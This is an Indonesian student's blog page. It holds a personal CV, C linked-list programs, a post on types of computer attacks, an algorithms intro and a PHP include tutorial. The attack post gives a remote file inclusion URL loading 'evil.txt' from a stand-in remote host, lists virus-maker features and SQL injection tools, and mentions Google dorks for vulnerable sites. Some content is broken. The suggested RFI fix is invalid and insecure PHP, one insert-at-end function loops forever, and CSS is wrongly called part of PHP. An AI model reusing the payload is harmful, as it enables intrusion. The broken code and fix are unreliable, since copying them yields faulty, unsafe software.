Welcome to DM's Note

a diary of
a dreamcatcherbelle

  • Home
  • College Note
    • Programming Networking Design
  • Social Media
    • Facebook Instagram Twitter
  • Review
    • Journey
    • Movies
    • Hair and Beauty
  • Portofolio
Home Archive for 2014
Nama Lengkap : Dian Mustikaningrum
Tempat / Tanggal lahir : Surakarta / 22 Oktober 1994
Jenis Kelamin : Wanita
Status : Lajang
Agama : Islam
Kewarganegaraan : Indonesia
Tinggi/ Berat badan : 160 cm/ 49 kg
Email : mustikaningrum_dian@yahoo.com / mustikaningrum.dian94@gmail.com
PENDIDIKAN FORMAL
Tahun
Institusi
2000-2006
SD Ta'mirul Islam Ska
2006-2009
SMPN 1 Ska
2009-2012
SMAN 1 Ska
2012- as soon as posible
Universitas Sebelas Maret
Beberapa program di bawah ini menggunakan dev c++ dengan menggunakan linked list. Semoga membantu :)

========================================================================
PROGRAM SISIP AWAL
/*sisip awal*/


#include<stdio.h>
#include<conio.h>
#include<malloc.h>

typedef struct simpul
{  int data;
   struct simpul *next;
   } node, *nodeptr;
   //void inisialisasi(nodeptr s) ->list g jadi di inisialisasi

void Inisialisasi(nodeptr *s)//pointer ke nodeptr
{ *s=NULL;
};

nodeptr NodeBaru(int m)
{
nodeptr n;

n=(nodeptr) malloc(sizeof(node));
if(n!=NULL)
  {n->data=m;
  n->next=NULL;
}
return n;
};

void SisipDepan(nodeptr *s,nodeptr p)
{
p->next=*s;
*s=p;
}

main()
{
nodeptr list, baru; //list:yg ditunjuk *s
Inisialisasi (&list); //list menunjuk ke null
baru=NodeBaru(5);
SisipDepan(&list,baru);
baru=NodeBaru(7);
SisipDepan(&list,baru);
baru=NodeBaru(3);
SisipDepan(&list,baru);
printf("nilai dari list adalah %d -> %d -> %d -> NULL \n " , list -> data , list->next->data, list->next->next->data);

return 0;

}

========================================================================
PROGRAM SISIP AKHIR
/*program sisip AKHIR*/

#include<stdio.h>
#include<conio.h>
#include<malloc.h>

typedef struct simpul
{  int data;
   struct simpul *next;
   } node, *nodeptr;
   //void inisialisasi(nodeptr s) ->list g jadi di inisialisasi

void Inisialisasi(nodeptr *s)//pointer ke nodeptr
{ *s=NULL;
};

nodeptr NodeBaru(int m)
{
nodeptr n;
n=(nodeptr) malloc(sizeof(node));
if(n!=NULL)
  {n->data=m;
  n->next=NULL;
}
return n;
};

void SisipDepan(nodeptr *s,nodeptr p)
{
p->next=*s;
*s=p;
}

void SisipAkhir(nodeptr *s,nodeptr p)
{
nodeptr tail;
tail=*s;
while (tail->next!=NULL)
p->next=*s;
*s=p;
}

void CetakList(nodeptr *s)
{
nodeptr temp;
temp=*s;
while (temp->next!=NULL)
{
printf("%d",temp->data);
temp=temp->next;
}
printf("%d->NULL",temp->data);
}

main()
{
nodeptr list, baru; //list:yg ditunjuk *s
Inisialisasi (&list); //list menunjuk ke null
baru=NodeBaru(5);
SisipDepan(&list,baru);
baru=NodeBaru(7);
SisipDepan(&list,baru);
baru=NodeBaru(3);
SisipDepan(&list,baru);
baru=NodeBaru(20);
SisipAkhir(&list,baru);
CetakList(&list);
//printf("nilai dari list adalah %d -> %d -> %d -> NULL \n " , list -> data , list->next->data, list->next->next->data);
getch();

return 0;
}
========================================================================
PROGRAM HAPUS AWAL
/*operasi hapus simpul awal*/


#include <stdio.h>
#include <conio.h>
#include <malloc.h>

typedef struct simpul{
int data;
struct simpul *next;
}Node, *nodeptr;
void Inisialisasi (nodeptr *s){
*s=NULL;
}

nodeptr NodeBaru(int m){
nodeptr n;
n=(nodeptr) malloc(sizeof(Node));
if(n!=NULL){
n->data=m;
n->next=NULL;
}
return n;
}

void SisipDepan(nodeptr *s, nodeptr p){
p->next=*s;
*s=p;
}

void SisipAkhir(nodeptr *s, nodeptr p)
{
nodeptr tail;
tail=*s;
while (tail->next!=NULL)
tail=tail->next;
tail->next=p;
}

void CetakList (nodeptr *s)
{
nodeptr temp;
temp = *s;
printf("List->");
if (temp==NULL) printf("NULL\n");
else
{
while (temp->next!=NULL)
{
printf ("%d->", temp->data);
temp=temp->next;
}
printf ("%d->NULL\n", temp->data);
}
}

void HapusAwal(nodeptr *s)
{
nodeptr hapus;
hapus=*s;
*s=hapus->next;
free(hapus);
hapus=NULL;
}
int main(){
nodeptr list, baru;
Inisialisasi(&list);
baru=NodeBaru(5);
SisipDepan(&list, baru);
baru=NodeBaru(7);
SisipDepan(&list, baru);
baru=NodeBaru(3);
SisipDepan(&list, baru);
baru=NodeBaru(6);
SisipAkhir(&list, baru);
HapusAwal(&list);
HapusAwal(&list);
HapusAwal(&list);
CetakList (&list);
//printf("Isi dari list adalah %d -> %d -> %d -> %d -> NULL", list->data, list->next->data, list->next->next->data,  list->next->next->next->data);
getch ();
return 0;
}
========================================================================
PROGRAM HAPUS AKHIR
/*operasi hapus simpul akhir*/


#include <stdio.h>
#include <conio.h>
#include <malloc.h>

typedef struct simpul{
int data;
struct simpul *next;
}Node, *nodeptr;
void Inisialisasi (nodeptr *s){
*s=NULL;
}

nodeptr NodeBaru(int m){
nodeptr n;
n=(nodeptr) malloc(sizeof(Node));
if(n!=NULL){
n->data=m;
n->next=NULL;
}
return n;
}

void SisipDepan(nodeptr *s, nodeptr p){
p->next=*s;
*s=p;
}

void SisipAkhir(nodeptr *s, nodeptr p)
{
nodeptr tail;
tail=*s;
while (tail->next!=NULL)
tail=tail->next;
tail->next=p;
}

void CetakList (nodeptr *s)
{
nodeptr temp;
temp = *s;
printf("List->");
if (temp==NULL) printf("NULL\n");
else
{
while (temp->next!=NULL)
{
printf ("%d->", temp->data);
temp=temp->next;
}
printf ("%d->NULL\n", temp->data);
}
}

void HapusAwal(nodeptr *s)
{
nodeptr hapus;
hapus=*s;
*s=hapus->next;
free(hapus);
hapus=NULL;
}

void HapusAkhir(nodeptr *s)
{
nodeptr hapus, before;
before=*s;
while (before->next->next!=NULL)
{
before=before->next;
}
hapus=before->next;
before->next=NULL;
free(hapus);
hapus=NULL;
}
int main(){
nodeptr list, baru;
Inisialisasi(&list);
baru=NodeBaru(5);
SisipDepan(&list, baru);
baru=NodeBaru(7);
SisipDepan(&list, baru);
baru=NodeBaru(3);
SisipDepan(&list, baru);
baru=NodeBaru(6);
SisipAkhir(&list, baru);
HapusAkhir(&list);
CetakList (&list);
//printf("Isi dari list adalah %d -> %d -> %d -> %d -> NULL", list->data, list->next->data, list->next->next->data,  list->next->next->next->data);
getch ();
return 0;
}


1) Virus Maker
Salah satu software yang digunakan adalah Terabit virus maker 2.8 SE, dibuat pada bulan September tahun 2007 di Iran. Virus ini dapat menyerang windows XP. Aplikasi ini akan terdeteksi oleh sebuah antivirus dengan nama virus: Backdoor.Win32.VB.bna
Terabit Virus Maker 2.8 ini berfungsi untuk membuat virus dengan kemampuan yang bisa kita pilih sendiri sehingga user bisa memakai dengan mudah.
Kegunaan :
•  Mematikan monitor
• Tidak ada suara dalam volume
• Stop SQL Server
• Always log off
• Delete all file in desktop
• Delete windows fonts
• Disible printer
• Disible regedit
• Disible windows firewall
• Mengclose sendiri IE dalam 10 menit, dll

2)Local File Inclusion(LFI) dan Remote File Inclusion(RFI)
LFI (Local File Inclusion) adalah celah pada situs dimana attacker bisa mengakses semua file di dalam server dengan hanya melalui URL.
RFI (Remote File Inclusion) adalah celah dimana site mengizinkan attacker mengincludekan file dari luar server.
Cara Pencegahan :
·    Memvalidasi variable.
· Mengkonfigurasi kembali settingan php pada server website anda.
·  Pada include mungkin bisa ditambahkan “./”
jadinya seperti ini,
Code:
include(“./”$_GET[imagefile].”.php”);
Maksudnya dengan seperti itu, saat kita mengakses file dari luar server maka hasilnya akan error karena saat pemrosesan setiap file yang masuk ke variable page akan ditambah ./ di depannya.
http://www.[target].com/index.php?imagefile=http://www.[remote].com/evil.txt

Dengan seperti ini server atau website yang diinject akan mencari file http://www.[remote].com/evil.txt dan pastinya akan menyebabkan server menampilkan error bahwa tidak ditemukannya file tsb.

3)Man In The Middle (MITM)
Serangan Man in The Middle merupakan suatu tipe serangan yang memanfaatkan kelemahan Internet Protocol. Serangan ini dikategorikan sebagai serangan berbahaya karena menyerang berbagai media informasi seperti web, handphone, dst.
Konsep dari serangan ini penyerang berada di tengah-tengah antara 2 komputer yang saling berkomunikasi. Hal ini memungkinkan bagi penyerang untuk mengubah, melihat, dan mengontrol data yang dikirim dari kedua komputer yang saling berkomunikasi itu. Secara fisik penyerang tidak harus diantara 2 komputer, tapi rute paket yang ditujukan bagi host lain harus melalui mesin penyerang.
Jenis-jenis serangan MITM:
·Sniffer adalah aktifitas menyadap yang di lakukan dalam jaringan yang sangat sulit untuk di cegah, walaupun kita telah menginstall berbagai macam software untuk mencegah serangan dalam jaringan.
·Spoofing adalah situasi di mana seseorang berhasil menyamar sebagai user  dengan memalsukan data dan dengan demikian mendapatkan keuntungan tidak sah.
·Fabrication adalah menambahkan objek atau informasi palsu pada informasi yang asli, sehingga data atau informasi berubah.
·Interception adalah  ancaman terhadap secrecy dimana orang yang tidak berhak namun berhasil mendapatkan akses informasi dari dalam sistem komputer.
·Modification adalah ancaman terhadap integrity dimana orang yang tidak berhak dapat mengakses maupun merubah suatu informasi.

Alternatif Pencegahan Serangan MITM:
1. Memahami authentification dan authorization
2.Menggunakan pro VPN, agar memiliki tingkat keamanan yg tinggi.

4) DDos Attack
DDoS Attack merupakan serangan yang dilakukan pada server dengan cara membanjiri server dengan request ping atau request lainnya dengan jumlah yang sangat banyak.
Gejala terkena DDos :
1.     Jumlah spam tiba-tiba meningkat
2.     Blog tidak bisa diakses
3.     Kinerja jaringan menurun, maka jaringan jadi lemot dan butuh waktu sangat lama mengakses blog/file
4.     Blog-blog tertentu tidak dapat diakses terus menerus
5.     Fitur tertentu pada sebuah website hilang
Cara Pencegahan : 
1. Jika menggunakan jasa hosting pihak ketiga
Teliti memilih penyedia hosting
Menjadi warga shared hosting yang baik
2. Jika mengelola server hosting kamu sendiri

Mengikuti perkembangan celah keamanan terbaru dari sistem operasi dan piranti lunak yang digunakan pada server hosting tersebut dan selalu patch secara teratur.

5)Cracking Password Wifi dengan WEP dan WPA

WEP adalah standart keamanan & enkripsi pertama yang digunakan pada wireless, suatu metoda pengamanan jaringan nirkabel, disebut juga dengan Shared Key Authentication.
Kelebihan WEP = 
1. susah di deteksi oleh metode brute force atttack karena passphrase nya adalah pergabungan antara angka dan huruf
Kelemahan WEP 
1. Masalah kunci yang lemah, algoritma RC4 yang digunakan dapat dipecahkan.
2. WEP menggunakan kunci yang bersifat statis
3. Masalah initialization vector (IV) WEP
4. Masalah integritas pesan Cyclic Redundancy Check (CRC-32)

WPA (Wi-Fi Protected Access) adalah suatu sistem yang juga dapat diterapkan untuk mengamankan jaringan nirkabel, metoda pengamanan dengan WPA ini diciptakan untuk melengkapi dari sistem yamg sebelumnya, yaitu WEP
Kelemahan WPA sampai saat ini adalah proses kalkulasi enkripsi/dekripsi yang lebih lama dan data overhead yang lebih besar.

6)Brute Force
Brute force adalah tekhnik dimana attacker memaksa masuk ke halaman admin suatu website dengan memanfaatkan random password yang telah mereka kumpulkan.
Syarat Penggunaan Brute Force:
1. Diperlukan koneksi yang setabil,
2. Berhasil atau tidaknya memperoleh informasi username dan password, tergantung dari kreatifitas kita menambahkan wordlist pada brute force,
3. Pengembangan pada google dorknya untuk mencari wordpress yang vuln atau bermasalah.
Cara Menanggulangi Serangan Brute Force:
1.     Mengubah Directory Admin, dimana pada wordpress untuk login dapat mengakses directory admin/wp-admin/ dapat diganti dengan nama dir yang di kehendaki
2.     Menginstall Plugin
 Stealth Login
Plugin ini dan merubah url default wp-admin kita, maka jika ada yang mencoba untuk masuk ke halaman wp-admin akan di redirect ke halaman depan website (index.php)
 Lockdown WP AdminIni adalah plugin yang paling banyak di pakai, karena cendrung lebih simple, tinggal ganti url defaultnya saja. Ketika ada yang iseng mencoba masuk ke halaman wp-admin maka akan dibawa ke halaman page notfound
Login LockDown
plugin ini mencatat alamat IP dan timestamp dari setiap kegagalan login pada CMS Wordpress. Jika sudah melebihi jumlah kesalahan login yang sudah ditentukan maka IP akan di banned.Plugin ini untuk menghindari serangan attacker yang memanfaatkan metode " Brute Force Attack " yaitu serangan yang menebak password untuk login ke suatu website.

7) Menembus Celah Keamanan Wifi dengan Tools Disploit
Disploit membantu para IT Security untuk menembus atau menemukan celah keamanan di jaringan WiFi maupun LAN
Tools yang dibutuhkan :
•      Smartphone Android harus memiliki ARM CPU
•      OS Android minimal versi 2.3 atau Gingerbread
•      Smartphone Android harus sudah di root
•      BusyBox telah diinstal secara lengkap (full installed)
•      Jaringan Wifi
•      User Target
8) SQL Injection
SQL injection adalah salah satu jenis penyerangan yang mengizinkan user tidak sah (penyerang) untuk mengakses database server. Sebuah teknik dimana dengan menggunakan atau menyalahgunakan sebuah celah keamanan yang terjadi dalam lapisan basis data sebuah aplikasi maupun web server.
Jadi, SQL Injection merupakan jenis aksi hacking pada keamanan komputer di mana seorang penyerang/attacker bisa mendapatkan akses ke basis data di dalam sistem (Sistem Utama)
3 jenis SQL Injection yang sering ditemui :
•      Error Based SQL Injection dalam aksinya akan memberikan sebuah perintah ke database sehingga menampilkan pesan error.
•      Union Based SQL Injection adalah metode SQL Injection perintah UNION untuk menggabungkan hasil dari dua atau lebih perintah SSELECT menjadi sebuah hasil tunggal.
•      Blind SQL Injection, jenis ini tidak menampilkan pesan error dan tidak menampilkan data atau informasi yang ada, terkadang sedikit sulit untuk melakukan eksploitasi untuk jenis Blind SQL Injection. 
Mengapa bisa terjadi SQL Injection?
• Tidak adanya penanganan terhadap karakter – karakter tanda petik satu ’ dan juga karakter double minus -- yang menyebabkan suatu aplikasi dapat disisipi dengan perintah SQL.
• Penggunaan pesan error yang masih bersifat default -- mudah untuk melacak query yang digunakan.
Bahaya SQL Injection :
•Memungkinkan seseorang dapat login ke dalam sistem tanpa harus memiliki account.
•Memungkinkan seseorang mengubah, menghapus, maupun menambahkan data–data yang berada di dalam database.
•Dapat mematikan database dari suatu aplikasi, sehingga tidak bisa memberi layanan kepada web server.
Berikut beberapa tools yang digunakan pada praktek SQL Injection :
1.     BSQL Hacker
2.     The Mole
3.     Pangolin
4.     SQLMap
5.      Enema SQLi
6.     SQL Ninja
7.     SQL Sus
8.     Safe SQL Injector
9.     SQL Poizon

Hacking tidak ada yg instants dan bisa berhasil dengan mudah, Mereka yg berhasil adalah mereka yg selalu sabar berusaha dan terus mencoba adalah pemenangnya. Dan gunakanlah metode hacking dengan niat yang baik untuk kebaikan orang banyak, jangan digunakan untuk kejahatan ya! Salam pembaca











Algoritma adalah langkah-langkah untuk menyelesaikan masalah secara pasti (bisa menggunakan kata-kata, pseuducode, dan flowchart).
Pengenalan struktur data :
1) Array : kumpulan data-data yang bertipe sama
2) Struct : kumpulan data-data dengan tipe berbeda
3)Pointer : menunjuk pada alamat yang dituju
4) Stack : konsep first in last out / last in first out
5) Queue : konsep first in first out
6) Linked List : daftar yang saling bertautan
Jika dari pengertian saja mungkin kalian masih bingung, lihat beberapa contoh algoritma di bawah ini:
Kata-kata : Algoritma membuat nasi goreng
Jadi kita harus menyiapkan alat dan bahan, lalu membuat bumbu, kemuadian memanaskan kompor dan sampai akhirnya makanan siap disantap. Seperti itu contoh algorima dengan kata-kata, simpel tapi butuh waktu yang lebih lama dalam penyampaian
Pseuducode : Algoritma input data dan menampilkan
#include <stdio.h>
#include <conio.h>
struct buku
{
char Judul [50];
char Pengarang[50];
int TahunTerbit;
int Harga;
}informasi[10];;
int i,n ;
int main()
{
printf("Banyaknya data yang akan diinput: ");
fflush(stdin);
scanf("%d", &n);
printf("\n");
fflush(stdin);
for(i=1;i<=n;i++)
    {
    printf ("Masukkan Judul\t\t:");
    fflush(stdin);
    gets(informasi[i].Judul);
    printf ("Masukkan Pengarang \t:");
    fflush(stdin);
    gets(informasi[i].Pengarang);
    printf ("Masukkan Tahun Terbit \t:");
    fflush(stdin);
    scanf("%d",&informasi[i].TahunTerbit);
    printf ("Masukkan Harga \t\t:");
    fflush(stdin);
    scanf("%d",&informasi[i].Harga);
    }
    printf("\n\n====================================================================\n");
    printf("Judul \t | \t Pengarang \t | \t Tahun Terbit \t | \t Harga \n");
    printf("========================================================================\n");
    for(i=1;i<=n;i++){
        printf("%s \t\t %s \t\t %d \t\t %d",informasi[i].Judul,informasi[i].Pengarang,informasi[i].TahunTerbit,informasi[i].Harga);
        printf("\n");
    }
    getch();
   
    return 0;
}

(disini penulis menggunakan devc++ dalam penggunaan algoritma pseuducode)

Flowchart: mungkin untuk lebih jelas tentang flowchart silahkan buka link http://id.wikipedia.org/wiki/Algoritma

Sekian pengenalan singkat tentang algoritma :)




Tentu yang sudah mahir dalam hal pemrograman web akan sangat mudah dalam pengaturan tampilan di webnya, tinggal diberi sedikit sentuhan seni di bagian template sudah bisa menghasilkan web dengan tampilan cantik dengan kekonsistenan tertentu dan dalam waktu pembuatan yang tidak lama. Namun, berbeda halnya dengan para newbie web atau blog yang masih awam, dalam hal pengaturan blog cenderung masih download dari web/blog penyedia template.  Bagi yang tertarik ingin menjadi web desainer, pertama kita harus kenalan dulu dengan css (cascading style sheet).  CSS adalah bagian dari PHP yang bisa mengubah style elemen pada tampilan halaman web kita agar lebih menarik.  Nah, bagi yang tertarik membuat desain tampilan webnya sendiri, ikuti yuk penjelasan singkat di bawah ini yak ..

Misal kita membuat script dengan nama welcome.php





Bila dijalankan di local browser tampilan akan terlihat seperti ini





Pengunjung pasti tidak akan tertarik untuk melihat blog kita ,karena  halamannya terlihat tidak menarik hanya black and white screen saja. Pertama kita coba menambah header dan footer pada tampilan tersebut dengan metode “include”, sebelumnya kita buat dulu file dengan judul header.php dan footer.php untuk disertakan pada file welcome.php


 header.php






footer.php





Setelah itu kita ubah script pada welcome.php














Dengan menyertakan script include header dan footer kita sudah mengubah tampilan web kita seperti ini


Tentu lebih menarik dari tampilan awal bukan?

Coba kita ubah style teks masukan nama pada welcome.php, agar rata tengah





Tampilan akan menjadi rata tengah seperti di bawah ini:


Bisa juga kita ganti background dengan gambar, kita harus punya gambarnya dulu, bisa langsung memberi url gambar ( tapi syaratnya harus ada koneksi internet). Disini kita coba dengan url, ubah script header.php pada bagian background menjadi seperti ini





Dan hasilnya . . .




Lebih menarik bukan? 
selamat mencoba J
Langganan: Postingan ( Atom )

ABOUT AUTHOR

Dian Mustikaningrum (20 years old) Study at Sebelas Maret University 2012

LATEST POSTS

  • Cara Include Header dan Footer pada PHP Dasar
  • Jenis jenis Serangan pada Komputer dan Jaringan
  • Pasar Tradisional di Surakarta

Categories

  • design
  • hairandbeauty
  • journey
  • movies
  • networking
  • programming

More information

email : mustikaningrum_dian@yahoo.com mustikaningrum.dian94@gmail.com

More Note

  • Electro Note
  • Anime Note

Blog Archive

  • ►  2015 (8)
    • ►  April (5)
    • ►  Maret (1)
    • ►  Februari (2)
  • ▼  2014 (5)
    • ▼  Mei (4)
      • Curriculum Vitae
      • Single Linked List
      • Jenis jenis Serangan pada Komputer dan Jaringan
      • Pengenalan Algoritma
    • ►  Maret (1)
      • Cara Include Header dan Footer pada PHP Dasar
  • ►  2013 (4)
    • ►  Desember (1)
    • ►  September (1)
    • ►  Mei (2)

Popular Posts

  • Cara Include Header dan Footer pada PHP Dasar
    Tentu yang sudah mahir dalam hal pemrograman web akan sangat mudah dalam pengaturan tampilan di webnya, tinggal diberi sedikit sentuhan sen...
  • Jenis jenis Serangan pada Komputer dan Jaringan
    1) Virus Maker Salah satu software yang digunakan adalah Terabit virus maker 2.8 SE,  dibuat pada bulan September tahun 2007 di Iran. Virus...
  • Pasar Tradisional di Surakarta
    Di Surakarta terdapat berbagai macam jenis pasar, baik tradisional yang modern. Pasar modern sendiri lebih banyak kita jumpai di dalam mall*...
  • Pengenalan Algoritma
    Algoritma adalah langkah-langkah untuk menyelesaikan masalah secara pasti (bisa menggunakan kata-kata, pseuducode, dan flowchart). Pengenal...
  • Jenis-jenis aroma creambath
    Siapa ya yang rajin merawat kulit kepala rambut? nah bagi agan atau ajeng yang pengen merawat kulit kepala ada salah satu cara yang mungkin ...

Latest Posts

  • Cara Include Header dan Footer pada PHP Dasar
  • Jenis jenis Serangan pada Komputer dan Jaringan
  • Pasar Tradisional di Surakarta

Labels

  • design
  • hairandbeauty
  • journey
  • movies
  • networking
  • programming

About

nothing special.. just want to be a kind person, brave lady, and your great friend :)
Copyright 2014 Welcome to DM's Note.
Blogger Templates Designed by OddThemes